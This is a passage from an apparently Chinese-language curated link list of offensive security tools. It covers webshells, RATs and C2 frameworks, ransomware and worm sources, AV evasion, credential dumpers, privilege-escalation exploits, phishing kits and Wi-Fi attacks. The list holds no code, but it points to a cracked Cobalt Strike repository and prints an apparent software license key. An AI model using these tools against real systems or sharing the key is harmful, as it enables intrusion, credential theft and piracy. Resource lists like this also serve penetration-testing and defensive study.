py3,利用特定的一句话脚本对网站进行管理 - https://github.com/wonderqs/Blade py,利用特定的一句话脚本对网站进行管理 - https://github.com/anestisb/WeBaCoo perl,利用特定的一句话脚本对网站进行管理 - https://github.com/keepwn/Altman .net配合mono,实现的跨平台菜刀 - https://github.com/k4mpr3t/b4tm4n 集成伪造邮件ddos,bat.php的webshell,初始k4mpr3t - https://github.com/dotcppfile/DAws 过防火墙webshell,post pass=DAws - https://github.com/b374k/b374k php网站管理,默认密码b374k - https://github.com/wso-shell/WSO webshell的文件管理,可以伪装为404界面 - https://github.com/UltimateHackers/nano php小马,附带py编写的生成器 - https://github.com/rebeyond/memShell 一款可以写入java web server内存中的webshell - https://github.com/DXkite/freebuf-stream-shell PHP使用流包装器实现WebShell。freebuf上有详细文章 - https://xz.aliyun.com/t/2799 利用动态二进制加密实现新型一句话木马之客户端篇 - https://github.com/rebeyond/Behinder “冰蝎”动态二进制加密网站管理客户端 - https://xz.aliyun.com/t/2744#toc-8 利用动态二进制加密实现新型一句话木马之Java篇 - https://xz.aliyun.com/t/2758#toc-4 利用动态二进制加密实现新型一句话木马之.NET篇 - https://xz.aliyun.com/t/2774#toc-4 利用动态二进制加密实现新型一句话木马之PHP篇 ## 内网拓展后渗透 - https://github.com/OpenWireSec/metasploit 后渗透框架 - https://github.com/EmpireProject/Empire 基于poweshell的命令执行框架 - https://github.com/TheSecondSun/Bashark 纯Bash脚本编写的后渗透框架,大鲨鱼 - https://github.com/JusticeRage/FFM py3,拥有下载、上传功能,生成可执行py脚本的后门的后渗透框架 - https://github.com/DarkSpiritz/DarkSpiritz py2,后渗透框架 - https://github.com/byt3bl33d3r/CrackMapExec 网络测试中的瑞士军刀,包含impacket、PowerSploit等多种模块 - https://github.com/SpiderLabs/scavenger 对CrackMapExec进行二次包装开发进行内网敏感信息扫描 - https://github.com/jmortega/python-pentesting python-pentesting-tool python安全工具相关功能模块 - https://github.com/0xdea/tactical-exploitation Python/PowerShell的测试脚本集 - https://github.com/PowerShellMafia/PowerSploit powershell测试脚本集与开发框架汇总 - https://github.com/samratashok/nishang powershell脚本集与利用框架 - https://github.com/PowerShellEmpire/PowerTools PowerShell脚本集,停止更新 - https://github.com/FuzzySecurity/PowerShell-Suite PowerShell脚本集 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts PowerShell脚本集 - https://github.com/nccgroup/redsnarf 窃取哈希,密码解密,偷偷调用猕猴桃等程序,rdp多方法利用,远程启动shell,清楚痕迹 - https://github.com/BloodHoundAD/BloodHound 用于分析域成员和用用户关系的程序,通过用powershell脚本导出域内的session、computer、group、user等信息,入库后进行可视化分析可以做到定点攻击。 - https://github.com/xorrior/RemoteRecon 利用DotNetToJScript进行截图、key记录、token窃取、dll与恶意代码注入 - https://github.com/SkyLined/LocalNetworkScanner 利用浏览器漏洞当对方打开网址时,扫描对方内网信息 - https://github.com/fdiskyou/hunter 调用 Windows API 对内网信息进行搜集很全面 - https://github.com/0xwindows/VulScritp 内网渗透脚本,包括banner扫描、端口扫描;phpmyadmin、jenkins等通用漏洞利用等 - https://github.com/lcatro/network_backdoor_scanner 基于网络流量的内网探测框架 - https://github.com/sowish/LNScan 详细的内部网络信息扫描器 - https://github.com/rootlabs/nWatch 联动nmap,并对组织内网进行扫描 - https://github.com/m8r0wn/nullinux 用于Linux的内部渗透测试工具,可用于通过SMB枚举操作系统信息,域信息,共享,目录和用户。 - https://github.com/zMarch/Orc bash,Linux下后渗透命令集合 ### 远程控制C2服务器 - https://github.com/malwaredllc/byob 僵尸网络生成框架 - https://github.com/proxycannon/proxycannon-ng 构建攻击僵尸网络 - https://github.com/deadPix3l/CryptSky/ 勒索软件poc - https://github.com/jgamblin/Mirai-Source-Code 蠕虫病毒poc - https://github.com/AhMyth/AhMyth-Android-RAT 基于smali,Windows下安卓远控,一对多带界面 - https://github.com/ssooking/cobaltstrike3.12_cracked java1.8,远控、钓鱼、内网 - https://github.com/Mr-Un1k0d3r/ThunderShell py2,CLI与web端,内存马,RC4加密HTTP传输 - https://github.com/tiagorlampert/CHAOS go,win远控,可过大部分杀软 - https://github.com/Ne0nd0g/merlin go,c2通讯,一对多 - https://github.com/0x09AL/Browser-C2 go,利用chrome以浏览器的形式连接C2服务器 - https://github.com/xdnice/PCShare c++,可以监视目标机器屏幕、注册表、文件系统等 - https://github.com/quasar/QuasarRAT c#,一对多,界面 - https://github.com/TheM4hd1/Vayne-RaT c#,一对多,界面 - https://github.com/nettitude/PoshC2 PowerShell、C#,远控工具,有win提权组件 - https://github.com/euphrat1ca/njRAT-v0.7d vb,常见蠕虫远控,有很多变种,一对多带界面 - https://github.com/zerosum0x0/koadic py3,利用JScript/VBScript 进行控制,大宝剑 - https://github.com/Ridter/MyJSRat py2,利用js后门,配合chm、hta可实现很多后门方式。evi1cg.me/archives/chm_backdoor.html - https://github.com/its-a-feature/Apfell py3,macOS与linux下的利用js后门,web界面管理 - https://github.com/peterpt/fuzzbunch py2,NSA漏洞利用工具,配有自动化安装脚本与gui界面,远控rat - https://github.com/n1nj4sec/pupy py,Windows, Linux, OSX, Android跨平台,一对多 - https://github.com/nathanlopez/Stitch py,Windows、Mac OSX、Linux跨平台 - https://github.com/neoneggplant/EggShell py,macos/osx远控,可生成HID代码,一对多 - https://github.com/Marten4n6/EvilOSX py,macos/osx远控,一对多 - https://github.com/vesche/basicRAT py3,simple远控,一对多 - https://github.com/Viralmaniar/Powershell-RAT py,截图通过gmail传输 - https://github.com/byt3bl33d3r/gcat py,使用 gmail 作为 C&C 服务器 - https://github.com/sweetsoftware/Ares py,c2通讯,支持代理 - https://github.com/micle-fm/Parat py,利用telegram,windows下的远程控制工具 - https://github.com/ahhh/Reverse_DNS_Shell py,通过dns传输 - https://github.com/iagox86/dnscat2 服务端为ruby(linux),客户端为C(win/linux),利用DNS协议进行端对端传输 - https://github.com/deepzec/Grok-backdoor py,利用ngrok的后门 - https://github.com/trustedsec/trevorc2 py,搭建一个合法的网站(可浏览),用于隐藏命令执行的客户端/服务器通信 ### 端口转发与代理工具 - https://github.com/fatedier/frp 用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议 - https://github.com/inconshreveable/ngrok 端口转发,正反向代理,内网穿透 - http://ngrok.ciqiuwl.cn/ 在线小米球ngrok - https://github.com/knownsec/rtcp Socket 端口转发,用于远程维护 - https://github.com/davrodpin/mole 基于ssh的端口转发 - http://rootkiter.com/EarthWorm 一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 - http://rootkiter.com/Termite/README.txt EarthWorm升级版,可以实现多节点跳跃 - https://github.com/SECFORCE/Tunna 可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制 - https://github.com/fbkcs/thunderdns 将tcp流量通过DNS协议转发,不需要客户端和socket5支持 - https://github.com/sensepost/reGeorg reDuh 的升级版,主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口(提供了php,asp,jsp脚本的正反向代理) - https://github.com/SpiderClub/haipproxy py3,Scrapy and Redis,高可用ip代理池 - https://github.com/chenjiandongx/async-proxy-pool py3异步爬虫ip代理池 - https://github.com/audibleblink/doxycannon 使用一个openvpn代理池,为每一个生成docker,当连接某一个vpn后,其它的进行socks5转发做流量分发 - https://github.com/decoder-it/psportfwd PowerShell编写的端口转发工具, 无需admin权限 - https://github.com/ls0f/gortcp go,通过主控端、中转、被控端实现内网穿透 ### Cross超越边界NPV - https://github.com/bannedbook/fanqiang/wiki cross汇总 - https://github.com/teddysun/across 梯子搭建 - https://github.com/ToyoDAdoubi/doubi 各种常用一键脚本 - https://github.com/Nyr/openvpn-install openvpn一键 - https://github.com/quericy/one-key-ikev2-vpn CentOS/Debian/Ubuntu一键安装IPSEC/IKEV2 VPN脚本 - https://github.com/teddysun/shadowsocks_install shadowsocks,shadowsocksr - https://github.com/guyingbo/shadowproxy ss/socks5/http//https等多种代理 - https://github.com/shadowsocks/shadowsocks-manager shadowsocks多用户管理 - https://github.com/leitbogioro/SSR.Go shadowsocksrr配置管理简化工具 - https://github.com/ssrpanel/SSRPanel ss\ssr\v2ray用户分布式管理 - https://github.com/xuanhuan/ss-panel ss用户分布式管理 - https://github.com/Ahref-Group/SS-Panel-smarty-Edition ss用户分布式管理,兑换码功能、商城系统,服务器信息 - https://github.com/Ccapton/brook-web brook程序服务端Web后台管理服务器(Linux|MacOS),基于python、flask、flask-restful - https://github.com/Ccapton/brook-ok Brook一键安装脚本 - https://github.com/txthinking/brook go,支持Linux/MacOS/Windows/Android/iOS的代理与vpn - https://github.com/gwuhaolin/lightsocks 轻量级网络混淆代理,基于 SOCKS5 协议,类SS - https://github.com/Umbrellazc/BypassCampusNet 校园网防断网; UDP 53 免流上网 - https://doub.io/dbrj-5/ 通过虚拟网卡转为类VPN全局代理SSTAP,还有sockscap64,比proxifier使用简单 - https://github.com/ntkernel/lantern unlimited-landeng-for-win,无限流量蓝灯 - https://www.psiphon3.com 开源赛风超越边界代理 - https://hide.me 可试用 - https://windscribe.com 可试用 - http://www.vpngate.net 日本国立筑波大学超越边界代理 - https://rava.app 注册可免费用一天 ### 横向移动与密码hash窃取 - http://www.oxid.it/cain.html Cain & Abel支持密码还原、arp中间人攻击 - https://github.com/gentilkiwi/mimikatz Windows下以抓取密码为主的横向移动神器 - https://github.com/skelsec/pypykatz 使用纯py3实现的mimikatz - https://github.com/eladshamir/Internal-Monologue 无需LSASS进程使用Mimikatz从LSASS进程内存中提取内容, 从内存中提取明文密码, NTLM哈希, Kerberos ticket, 以及执行pass-the-hash/pass-the-ticket攻击等 - https://github.com/AlessandroZ/LaZagne py3,密码抓取工具 - https://github.com/AlessandroZ/LaZagneForensic LaZagne密码破解升级版,利用DPAPI,目前缺陷是需要windows user密码 - https://github.com/twelvesec/passcat Windows 下密码抓取工具 - https://github.com/huntergregal/mimipenguin linux密码抓取神器 - https://github.com/quarkslab/quarkspwdump quarkslab出品的密码抓取工具,不用注入任何进程 - https://github.com/mthbernardes/sshLooter 从ssh服务中窃取用户名密码 - https://github.com/nettitude/Invoke-PowerThIEf 利用IE进行后渗透,抓取密码、重定向等 - https://github.com/GhostPack/Rubeus 操作Kerberos的库, 实现了Kekeo的大部分功能, C#编写 - https://github.com/m8r0wn/ldap_search PY,通过ldap(轻量目录访问协议)认证,列举win域信息,爆破登录 ### Linux提权相关 - https://github.com/AlessandroZ/BeRoot py,通过检查常见的错误配置来查找提权方法. 支持Windows/Linux/Mac - https://github.com/mschwager/0wned 利用python包进行高权限用户创建 - https://github.com/mzet-/linux-exploit-suggester 查找linux有哪些补丁没有打的脚本 - https://github.com/belane/linux-soft-exploit-suggester 查找linux有哪些有漏洞的软件 - https://github.com/dirtycow/dirtycow.github.io 脏牛提权漏洞exp - https://github.com/FireFart/dirtycow 脏牛提权漏洞exp - https://github.com/stanleyb0y/sushell 利用su小偷实现低权限用户窃取root用户口令 - https://github.com/jas502n/CVE-2018-17182/ Linux 内核VMA-UAF 提权漏洞 CVE-2018-17182 - https://github.com/jas502n/CVE-2018-14665 CVE-2018-14665,linux下Xorg X服务器提权利用 - https://github.com/nmulasmajic/syscall_exploit_CVE-2018-8897 Linux系统利用Syscall实现提权 - https://github.com/can1357/CVE-2018-8897 Linux系统利用Syscall实现提权 - https://github.com/SecWiki/linux-kernel-exploits linux-kernel-exploits Linux平台提权漏洞集合 - https://github.com/nilotpalbiswas/Auto-Root-Exploit linux自动提权脚本 - https://github.com/WazeHell/PE-Linux Linux提权工具 - https://guif.re/linuxeop linux提权命令集合 ### Windows提权相关 - http://www.fuzzysecurity.com/tutorials/16.html windows平台教程级提权参考文章 - https://github.com/SecWiki/windows-kernel-exploits Windows平台提权漏洞Exp集合 - https://github.com/51x/WHP windows下各种提权与利用工具 - https://github.com/rasta-mouse/Sherlock win提权漏洞验证 - https://github.com/WindowsExploits/Exploits 微软CVE-2012-0217、CVE-2016-3309、CVE-2016-3371、CVE-2016-7255、CVE-2017-0213提权利用 - https://github.com/decoder-it/lonelypotato RottenPotatoNG变种,利用NBNS本地域名欺骗和WPAD代理欺骗提权 - https://github.com/ohpe/juicy-potato RottenPotatoNG变种,利用com对象、用户token进行提权 - https://github.com/foxglovesec/Potato RottenPotatoNG变种,利用本地域名欺骗和代理欺骗提权 - https://github.com/DanMcInerney/icebreaker 处于内网环境但又在AD环境之外,icebreaker将会帮助你获取明文Active Directory凭据(活动目录存储在域控服务器可用于提权) - https://github.com/hausec/ADAPE-Script Active Directory权限提升脚本 - https://github.com/klionsec/BypassAV-AllThings 利用aspx一句话配合提权payload提权 - https://github.com/St0rn/Windows-10-Exploit msf插件,win10 uac bypass - https://github.com/sam-b/CVE-2014-4113 利用Win32k.sys内核漏洞进行提取,ms14-058 - https://github.com/breenmachine/RottenPotatoNG 利用NBNS本地域名欺骗和WPAD代理欺骗提权 - https://github.com/unamer/CVE-2018-8120 影响Win32k组件,针对win7和win2008提权 - https://github.com/alpha1ab/CVE-2018-8120 在win7与win2k8的基础上增加了winXP与win2k3 - https://github.com/0xbadjuju/Tokenvator 使用Windows令牌提升权限的工具,提供一个交互命令行界面 ### 权限绕过 - https://payloads.online/archivers/2018-12-22/1 DLL Hijacking & COM Hijacking ByPass UAC - 议题解读 - https://github.com/tyranid/DotNetToJScript 能够利用JS/Vbs脚本加载.Net程序的工具 - https://github.com/mdsecactivebreach/SharpPack 绕过系统应用白名单执行DotNet and PowerShell tools - https://github.com/rootm0s/WinPwnage py2,win下权限提升,uac绕过,dll注入等 - https://github.com/hfiref0x/UACME 包含许多用于多个版本操作系统上绕过Windows用户帐户控制的方法 - https://github.com/Ben0xA/nps 实现了不使用powershell.exe的情况下执行powershell命令 - https://github.com/Mr-Un1k0d3r/PowerLessShell 实现了不调用powershell.exe的情况下执行powershell命令 - https://github.com/p3nt4/PowerShdll 使用rundll32运行PowerShell,绕过软件限制 - https://github.com/ionescu007/r0ak 内核层的瑞士军刀. 在Windows10内核中读/写/执行代码 - https://github.com/leechristensen/UnmanagedPowerShell 从一个非托管程序来执行PowerShell,经过一些修改后可以被用来注入到其他进程 - https://github.com/stephenfewer/ReflectiveDLLInjection 一种库注入技术,让DLL自身不使用LoadLibraryA函数,将自身映射到目标进程内存中 - https://github.com/ChrisAD/ads-payload 利用环境变量与destop.ini绕过windows下的Palo Alto Traps endpoint 防护软件 - https://github.com/Zer0Mem0ry/RunPE 通过内存读取,网络传输内容,利用PE执行shellcode ### 沙盒逃逸 - https://github.com/hacksysteam/WpadEscape 利用wpad进行浏览器 sandbox沙箱逃逸 - https://github.com/unamer/vmware_escape vmware虚拟机逃逸。CVE-2017-4901,CVE-2018-6981,CVE-2018-6982 - https://github.com/MorteNoir1/virtualbox_e1000_0day VirtualBox E1000 Guest-to-Host Escape逃逸。教程 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1682&desc=2 Ghostscript:基于漏洞CVE-2018-17961的-dSAFER沙盒逃逸技术 ### 后门免杀代码混淆 - https://www.shellterproject.com 杀毒软件绕过 - https://github.com/trustedsec/unicorn py,一键生成多种后门 - https://github.com/islamTaha12/Python-Rootkit windows下rootkit,反弹meterpreter - https://github.com/n00py/Hwacha linux下快速生成metepreter等多种payload - https://github.com/Screetsec/Vegile msf免杀,程序注入 - https://github.com/MohamedNourTN/Terminator py2,msf免杀 - https://github.com/Veil-Framework/Veil msf免杀 - https://github.com/abedalqaderswedan1/aswcrypter py、bash,msf免杀 - https://github.com/Screetsec/TheFatRat java,msf免杀,利用searchsploit快速搜索 - https://github.com/pasahitz/zirikatu msf免杀 - https://github.com/govolution/avet msf免杀 - https://github.com/GreatSCT/GreatSCT msf免杀 - https://github.com/EgeBalci/HERCULES msf免杀 - https://github.com/trustedsec/nps_payload msf免杀 - https://github.com/4w4k3/Insanity-Framework py,payload生成,过杀软,识别虚拟机,钓鱼,内存注入等 - https://github.com/hlldz/SpookFlare Meterpreter,Empire,Koadic等loader/dropper的生成器,可以绕过客户端检测和网络端检测的端点策略 - https://github.com/pasahitz/regsvr32 使用C#+Empire实现最小体积免杀后门 - https://github.com/malcomvetter/UnstoppableService 将自身安装为Windows服务且管理员无法停止/暂停服务的程序. C#编写 - https://github.com/Cn33liz/StarFighters 基于DotNetToJScript,利用JavaScript和VBScript执行Empire Launcher - https://github.com/mdsecactivebreach/SharpShooter 基于DotNetToJScript使用js、vbs,用于检索和执行任意CSharp源码的payload创建框架 - https://github.com/mdsecactivebreach/CACTUSTORCH 基于DotNetToJScript使用js、vbs生成恶意payload - https://github.com/OmerYa/Invisi-Shell 对powershell文件进行混淆 - https://github.com/danielbohannon/Invoke-DOSfuscation 对powershell文件进行混淆,加密操作以及重新编码 - https://github.com/danielbohannon/Invoke-Obfuscation 对powershell文件进行混淆,加密操作以及重新编码 - https://github.com/Mr-Un1k0d3r/SCT-obfuscator Cobalt Strike SCT有效载荷混淆器 - https://github.com/tokyoneon/Armor bash,生成加密 Payload 在 macOS 上反弹 Shell - https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator 宏混淆,其中还包括AV/Sandboxes逃避机制 - https://github.com/Kkevsterrr/backdoorme py3、py2多种类型的后门、shell生成工具,可以自动维持权限 - https://github.com/TestingPens/MalwarePersistenceScripts win下权限维持脚本 - https://github.com/mhaskar/Linux-Root-Kit py,simple,linux下rootkit - https://github.com/PinkP4nther/Sutekh simple,rootkit,使普通用户获取root shell - https://github.com/threatexpress/metatwin 从一个文件中提取元数据,包括数字签名,并注入到另一个文件中 - https://github.com/Mr-Un1k0d3r/Windows-SignedBinary 可以修改二进制文件的HASH,同时保留微软windows的签名 - https://github.com/secretsquirrel/SigThief py,用于劫持合法的数字签名并绕过Windows的哈希验证机制的脚本工具 - https://github.com/9aylas/Shortcut-Payload-Generator 快捷方式(.lnk)文件Payload生成器.AutoIt编写 - https://github.com/GuestGuri/Rootkit 反弹一个tcp连接,将进程id绑定到一个空文件夹 - https://github.com/secretsquirrel/the-backdoor-factory 可以生成win32PE后门测试程序,ELF文件后门程序等 ### 文件捆绑 - bat2exe.net 相类似也可以利用iexpress与winrar生成自解压exe可执行文件 - https://github.com/islamadel/bat2exe 将bat文件转换为exe二进制文件 - https://github.com/tywali/Bat2ExeConverter 将bat文件转换为exe二进制文件 - https://github.com/Juntalis/win32-bat2exe 将bat文件转换为exe二进制文件 - http://www.f2ko.de/downloads/Bat_To_Exe_Converter.zip 将bat文件转换为exe二进制文件,可以隐藏窗口。 - https://github.com/r00t-3xp10it/trojanizer 将两个可执行文件打包为自解压文件,自解压文件在执行时会执行可执行文件 - https://github.com/r00t-3xp10it/backdoorppt 将payload更换图标 - https://github.com/r00t-3xp10it/FakeImageExploiter 将payload更换图标。需要wine与resourcehacker环境 - https://github.com/DamonMohammadbagher/FakeFileMaker 更换图标和名称 - https://github.com/peewpw/Invoke-PSImage 将PS脚本隐藏进PNG像素中并用一行指令去执行它 - https://github.com/Mr-Un1k0d3r/DKMC Don’t kill my cat生成混淆的shellcode,将shellcode存储在多语言图像中 - https://github.com/deepzec/Bad-Pdf 生成一个pdf文件,内含payload来窃取win上的Net-NTLM哈希 - https://github.com/3gstudent/Worse-PDF 向PDF文件中插入恶意代码,来窃取win上的Net-NTLM哈希 ## 社工相关 - https://github.com/brannondorsey/PassGAN py,深度学习,密码字典样本生成 - https://github.com/Mebus/cupp 根据用户习惯密码生成弱口令探测 - https://github.com/Saferman/cupper 根据用户习惯密码生成弱口令探测,楼上升级 - https://github.com/LandGrey/pydictor py3,特定密码字典生成 - https://github.com/mehulj94/Radium-Keylogger python下的键盘记录工具 - https://github.com/threatexpress/domainhunter 检查过期域名,bluecoat分类和Archive.org历史记录,以确定最为适合于钓鱼和C2的域名 - https://github.com/Mr-Un1k0d3r/CatMyPhish 收集目标类似的尚未注册的域名 - https://github.com/x0day/Multisearch-v2 Bing、google、360、zoomeye等搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息 - https://github.com/n0tr00t/Sreg Sreg可对使用者通过输入email、phone、username的返回用户注册的所有互联网护照信息。 - https://github.com/SpiderLabs/social_mapper 社交媒体枚举和关联工具, 通过人脸识别关联人物侧写 - https://github.com/vysec/MaiInt 公司雇员信息收集测试工具 - https://github.com/jofpin/trape py,利用OSINT对人员进行追踪定位 - https://github.com/famavott/osint-scraper 输入人名或邮箱地址, 自动从互联网爬取关于此人的信息 - https://github.com/xHak9x/fbi py2,facebook脸书信息搜集工具 - https://github.com/initstring/linkedin2username 通过Linkedin 领英获取相关公司员工列表 - https://github.com/0x09AL/raven linux下领英Linkedin information gathering tool - https://github.com/Ridter/Mailget 通过脉脉用户猜测企业邮箱 - https://github.com/haccer/tweep 使用twitter API进行信息爬取查询 - https://github.com/MazenElzanaty/TwLocation py,获取Twitter用户发推的地址 - https://github.com/vaguileradiaz/tinfoleak web界面,对某人的twitter进行全面的情报分析 - https://github.com/deepfakes 虚假音视频制作 - https://www.jianshu.com/p/147cf5414851 聊聊那些常见的探侦类APP - https://github.com/thinkst/canarytokens 重要文件的追踪溯源,信标定位(https://canarytokens.org/generate#) - https://github.com/ggerganov/kbd-audio c++,linux,利用麦克风监控键盘输入测试输入值 ### 网站克隆镜像伪造 - http://www.httrack.com 网站克隆镜像 #### 钓鱼框架邮件伪造 - https://github.com/bhdresh/SocialEngineeringPayloads 负责收集用于证书盗窃和鱼叉式网络钓鱼攻击的社交工程技巧和payloads - https://github.com/trustedsec/social-engineer-toolkit 专为社交工程设计的开源渗透测试框架 - https://github.com/thelinuxchoice/blackeye 拥有facebook、instagram等三十余个钓鱼模板的一键启用工具 - https://github.com/M4cs/BlackEye-Python 以blackeye为基础加强子域的管理 - https://github.com/azizaltuntas/Camelishing py3,界面化社会工程学攻击辅助工具 - https://github.com/JonCooperWorks/judas go,克隆网站钓鱼 - https://github.com/gophish/gophish go,拥有在线模板设计、发送诱骗广告等功能的钓鱼系统 - https://github.com/tatanus/SPF py2,deefcon上的钓鱼系统 - https://github.com/MSG-maniac/mail_fishing 甲方内部钓鱼系统 - https://github.com/samyoyo/weeman 钓鱼的http服务器 - https://github.com/Raikia/FiercePhish 可以管理所有钓鱼攻击的完整钓鱼框架,允许你跟踪单独的网络钓鱼活动,定时发送电子邮件等 - https://github.com/securestate/king-phisher 可视化钓鱼活动工具包 - https://github.com/fireeye/ReelPhish 实时双因素网络钓鱼工具 - https://github.com/kgretzky/evilginx 绕过双因素验证的钓鱼框架 - https://github.com/kgretzky/evilginx2 MiTM 框架, 登录页面钓鱼, 绕过双因素认证等 - https://github.com/ustayready/CredSniper 使用Flask和Jinja2模板编写的网络钓鱼框架,支持捕获2FA令牌 - https://github.com/fireeye/PwnAuth OAuth滥用测试检测平台 - https://github.com/n0pe-sled/Postfix-Server-Setup 自动化建立一个网络钓鱼服务器 - https://github.com/Dionach/PhEmail py2,钓鱼与邮件伪造 - https://github.com/PHPMailer/PHPMailer 世界上最流行的PHP发送邮件的代码 - http://tool.chacuo.net/mailanonymous 在线邮件伪造 - http://ns4gov.000webhostapp.com 在线邮件伪造 ### 中间人攻击流量劫持 - https://github.com/bettercap/bettercap 网络攻击以及监控的瑞士军刀。该工具支持多种模块,比如ARP/DNS欺骗、TCP以及数据包代理等 - https://github.com/mitmproxy/mitmproxy PY,支持SSL拦截,进行https流量代理 - https://github.com/qiyeboy/BaseProxy py3,异步http/https代理,楼上简化版。可以作为中间人工具,比如说替换网址图片等 - https://github.com/lgandx/Responder 用于嗅探网络内所有的NTLM、NTLMv1/v2、Net-NTLMv1/v2包,对网络内主机进行欺骗获取用户hash。a拿着b密码请求b,c对a说我是b,然后c获得了b的密码,https://www.secpulse.com/archives/65503.html 【脉搏译文系列】渗透师指南之Responder。 - https://github.com/Kevin-Robertson/Inveigh 一款PowerShell LLMNR / mDNS / NBNS欺骗器和中间人工具 - https://github.com/LionSec/xerosploit 中间人攻击测试工具包 - https://github.com/AlsidOfficial/WSUSpendu 可以自主创建恶意更新,并将其注入到WSUS服务器数据库中,然后随意的分发这些恶意更新 - https://github.com/infobyte/evilgrade 一个模块化的脚本框架,使攻击者在不知情的情况下将恶意更新注入到用户更新中 - https://github.com/quickbreach/smbetray 专注于通过文件内容交换、lnk交换来攻击客户端,以及窃取任何以明文形式传输的数据 - https://github.com/mrexodia/haxxmap 对IMAP服务器进行中间人攻击 ### 协议解析流量还原分析 - https://github.com/wireshark/wireshark 协议解析流量分析还原 - https://github.com/CoreSecurity/impacket Impacket是用于处理网络协议的Python工具包集合,内网中可用以提权例如wmiexec.py、NMB,SMB1-3和MS-DCERPC提供对协议实现本身的低级别编程访问。 - https://github.com/secdev/scapy 内置了交互式网络数据包处理、数据包生成器、网络扫描器网络发现和包嗅探工具,提供多种协议包生成及解析插件,能够灵活的的生成协议数据包,并进行修改、解析。 - https://gitee.com/qielige/openQPA 协议分析软件QPA的开源代码,特点是进程抓包、特征自动分析 - https://github.com/jtpereyda/boofuzz 网络协议fuzz测试 - https://www.jianshu.com/p/4dca12a35158 5个常用的免费报文库 - https://github.com/zerbea/hcxdumptool 从Wlan设备上捕获数据包 - https://github.com/NytroRST/NetRipper 支持截获像putty,winscp,mssql,chrome,firefox,outlook,https中的明文密码 - https://github.com/shramos/polymorph 支持几乎所有现有协议的实时网络数据包操作框架 - https://github.com/nospaceships/raw-socket-sniffer C,PS,无需驱动抓取Windows流量 ### 无线网络WIFI中间人攻击 - https://github.com/wi-fi-analyzer/fluxion 窃取用户wifi密码的进行密码重放攻击 - https://github.com/0v3rl0w/e013 窃取Wifi密码. VB脚本 - https://github.com/cls1991/ng 获取你当前连接wifi的密码与ip - https://github.com/wifiphisher/wifiphisher PY,中间人攻击,FakeAp恶意热点,WIFI钓鱼,凭证窃取 - https://github.com/1N3/PRISM-AP 自动部署RogueAP(恶意热点) MITM攻击框架 - https://github.com/sensepost/mana Wifi劫持工具,可以监听计算机或其他移动设备的Wifi通信,并能够模仿该设备 - https://github.com/deltaxflux/fluxion bash与py,对使用wpa协议的无线网络进行MiTM攻击 - https://github.com/DanMcInerney/LANs.py ARP欺骗,无线网络劫持 ### 无线网络WIFI防御 - https://github.com/SYWorks/waidps PY,Linux下无线网络入侵检测工具 - https://github.com/SkypLabs/probequest 嗅探和显示无线网卡附近的Wifi Probe请求 - https://github.com/wangshub/hmpa-pi 在树莓派或路由,利用 Wireshark 扫描附近网络 WiFi 设备,当有手机或其它 Wi-Fi 设备在附近时,通过邮件或者微信提醒 - https://github.com/besimaltnok/PiFinger 检查wifi是否为"Wifi-Pineapple大菠萝"所开放的恶意热点 - https://github.com/WiPi-Hunter/PiSavar 利用PineAP,对于FAKE AP虚假接入点,如"Wifi-Pineapple大菠萝"进行监测 ### 无线网络WIFI审计测试 - https://www.wifislax.com 西班牙wifi审计系统,国内汉化版为无线革新5.1.1 Wifislax-WRC - https://cn.elcomsoft.com/ewsa.html ewsa,wifi嗅探,握手包密码还原,EWSA-173-HC1UW-L3EGT-FFJ3O-SOQB3 - https://www.passcape.com wifipr,握手包密码还原,另外还有许多商业版windows下密码还原工具 - https://github.com/MisterBianco/BoopSuite 无线网络审计工具,支持2-5GHZ频段 - https://github.com/aircrack-ng/aircrack-ng 由数据包嗅探器、检测器、WPA / WPA2-PSK 解密器、WEP 和用于 802.11 无线局域网的分析工具组成 - https://github.com/t6x/reaver-wps-fork-t6x wps跑pin码攻击,常见wifi攻击 - https://github.com/derv82/wifite2 wifite无线审计工具升级版,联动aircrack-ng与reaver - https://github.com/savio-code/fern-wifi-cracker 无线安全审计工具 - https://github.com/P0cL4bs/WiFi-Pumpkin 无线安全渗透测试套件 - https://github.com/entropy1337/infernal-twin 自动化无线攻击工具Infernal-Wireless - https://github.com/m4n3dw0lf/PytheM Python网络/渗透测试工具 - https://github.com/InfamousSYN/rogue 无线网络攻击工具包 - https://github.com/cSploit/android 手机WiFi渗透工具框架,可以使用msf - https://github.com/chrisk44/Hijacker 手机wifi测试工具 - https://andrax-pentest.org/ kali hunter手机渗透测试系统 - https://www.zimperium.com/zanti-mobile-penetration-testing 手机wifi渗透工具 ### 数据取回隐秘传输 - https://github.com/TryCatchHCF/Cloakify 躲避DLP/MLS数据泄露防护系统,突破数据白名单控制,躲避AV检测进行数据盗取 - https://github.com/sensepost/DET 使用单个或多个通道同时执行数据取回 - https://github.com/Arno0x/DNSExfiltrator 利用DNS解析进行数据隐秘传输的工具 - https://github.com/ytisf/PyExfil 用于数据取回的Python软件包 - https://github.com/Arno0x/ReflectiveDnsExfiltrator反射DNS解析隐蔽通道进行数据泄露 # 硬件安全 - https://github.com/unprovable/PentestHardware 硬件渗透测试实用手册 - https://ducktoolkit.com/ 橡皮鸭、HID键盘模拟器 - https://github.com/insecurityofthings/jackit 用于Mousejack的开发代码 - https://github.com/samyk/magspoof 信用卡信息盗取 - https://github.com/mame82/P4wnP1_aloa 在树莓派Raspberry Pi上安装常用的测试组件,打造移动测试平台 - https://www.freebuf.com/geek/195631.html 成为物理黑客吧!利用树莓派实现P4wnP1项目进行渗透测试 - https://github.com/mame82/P4wnP1 在树莓派安装网络劫持键盘注入(WHID)工具 - https://github.com/ebursztein/malusb 创建跨平台的HID欺骗payload,并在Windows和OSX上建立反向TCP-shell - https://github.com/Orange-Cyberdefense/fenrir-ocd 主要功能和用途是绕过有线802.1x保护并使你能够访问目标网络 - https://github.com/360PegasusTeam/GhostTunnel 可在隔离环境下使用HID生成隐蔽后门,释放有效负载后删除自身 - https://github.com/LennyLeng/RadioEye RFID配合常见的NFC使用 - https://github.com/Proxmark/proxmark3/ RFID神器PM3 - http://www.freebuf.com/news/others/605.html RFID Hacking–资源大合集 - 